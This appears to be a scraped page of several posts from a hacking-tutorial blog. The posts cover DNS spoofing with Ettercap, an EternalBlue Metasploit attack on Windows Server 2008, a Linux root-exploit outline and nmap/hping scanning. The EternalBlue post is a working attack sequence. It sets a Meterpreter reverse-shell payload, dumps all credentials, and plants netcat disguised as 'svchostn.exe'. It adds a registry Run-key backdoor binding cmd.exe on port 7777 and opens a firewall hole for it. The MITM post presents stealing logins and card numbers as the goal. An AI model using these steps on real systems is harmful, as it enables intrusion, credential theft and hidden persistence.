best sinhala blog in sri lanka
Hi all this is the gcam mod Pixel 4 Google Camera 7.0

best sinhala blog in sri lanka
Hi All today i am going to show how to do a DNS Spoof Attack

So first of all i am going to show how the network map is

Before start i am going to describe what is What is man in the middle attack.

What is man in the middle attack

A man in the middle (MITM) attack is a general term for when a attacker positions himself in a conversation between a user and an application

Why man in the middle attack ?

To Steal personal information ( login credentials, account details and credit card numbers)

Common Targets

Financial applications
SaaS businesses
e-commerce sites and other websites where logging in is required.


  • Identity Theft
  • Unapproved fund transfers
  • Password change
  • Gain a access to a secured perimeter

Types of MITMA

  • IP spoofing
  • DNS spoofing
  • HTTPS spoofing
  • SSL hijacking
  • Email hijacking
  • Wi-Fi eavesdropping
  • Stealing browser cookies

So now we can Start our Lesson

On Hacker Machine

Kali Linux Latest

On Target Machine Windows 10 Latest

Load config file


edit config file with following

change the “ec_uid” and “ec_gid” values to 0

after that find and uncomment these two lines:
redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"
redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"

Save changes

Then Load Ettercap by searching from the application list or execute sudo -E ettercap -G this in terminal

Now you can watch this Video to get a clear idea

best sinhala blog in sri lanka
Hi All Today im going to show how to hack Windows Server 2008 with Fresh installation

All you can find thing by looking at following Video

These are the commands 

Find and load Exploit

Get a terminal


msf5 > search eternalblue

msf5 > use exploit/windows/smb/ms17_010_eternalblue
msf5 exploit(windows/smb/ms17_010_eternalblue) > show options

msf5 exploit(windows/smb/ms17_010_eternalblue) > set RHOSTS [Your target ip]

msf5 exploit(windows/smb/ms17_010_eternalblue) > show payloads

msf5 exploit(windows/smb/ms17_010_eternalblue) > set payload windows/x64/meterpreter/reverse_tcp

msf5 exploit(windows/smb/ms17_010_eternalblue) > show options
msf5 exploit(windows/smb/ms17_010_eternalblue) > set LHOST [Your ip]
msf5 exploit(windows/smb/ms17_010_eternalblue) > run

After exploit we can execute this 

To Load cmd.exe 
meterpreter > shell


To get all Usernames and Passwords

meterpreter > 
meterpreter > load kiwi
meterpreter > creds_all

Upload netcat to server and rename it a look like system executable

meterpreter > upload /usr/share/windows-binaries/nc.exe svchostn.exe

meterpreter > reg setval -k HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run -v svchostn -d 'C:\Windows\system32\svchostn.exe -Ldp 7777 -e cmd.exe'

meterpreter > reg queryval -k HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run -v svchostn

View Firewall Rules and apply new rules

meterpreter > shell

C:\Windows\system32>netsh  firewall show opmode

netsh advfirewall firewall add rule name="Service Window" dir=in action=allow protocol=TCP localport=7777


meterpreter > execute -f svchostn.exe -Ldp 7777 -e cmd.exe

On New window

nc 7777

best sinhala blog in sri lanka
Hi all today im going to show how to get root shell in Ubuntu 12.04.5 version

First of all read this post to get how to get riverse shell from webserver

After you have get a shell from web server, i will continue this

And create named pipes file in /tmp folder

Then pass that to Hacker’s Machine via netcat

Capture that from kali machine

From that, open /bin/bash from python to get more interactive shell

Then get ubuntu and kernel version of that ubuntu machine

From another terminal window, update the searchsploit database

Then search available exploit to that version

Copy to different location

open http server to transfer the exploit to ubuntu machine

Download that file from the terminal

Now compile that using gcc

Now run that exploit to get root shell

Successfully get a root privilege from that

best sinhala blog in sri lanka

As i describe how to scan with nmap in this article,  today i am goiing to show how to scan network in a advanced way.

1 . Layout

Im using python HTTP server in different ports such as on , off, well known and less known ports to demonstrate how this is working

First of all we can discuss how the Transmission Control Protocol Breakdown

Each TCP packet has a section in it’s memory buffer where Control Bits such as URG | ACK | PSH | RST | SYN | FIN can be set.

So How is this URG, ACK, PSH, RST, SYN, FIN works?

here is a small photo that describes all

Image result for how tcp connection is established

Can we change the state SYN to ACK ?

  • yes, that is possible. thats why we need nmap and hping for that

from those tools we can send specific control bits in packets which we are send.

Let's discuss how ip scanners are working

Normally they scanning via icmp

So First of all i scanned my network

so 103 is my ubuntu ip

So simply i disabled icmp in ubuntu

and edit 1 to 0

then again i tried to scan the network

Boom! it not discovering

Then i tried to ping ubuntu machine

it was unsuccessful

SYN Scan

So i was tried to scan using syn scan

#hping : hping -S <address block>
#Nmap : nmap -sS <address block>
#fping : fping -a -g <address block>

-S : Sets the SYN flag getting passed onto the packet

-sS : SYN flag scan
-sn: ICMP ECHO scan

This is how wireshark looks like when running syn scan

I used firewall to block the 80 port and check syn scan

then enable port 80 in the firewall and tried

Boom! it received SYN,ACK flag

RST scan

ACK Scan


hping -F -P -U <ip address>

in this command you can see it has multiple Flags

Nmap commands are :
-sX (Xmas scan)
-sN (Null scan)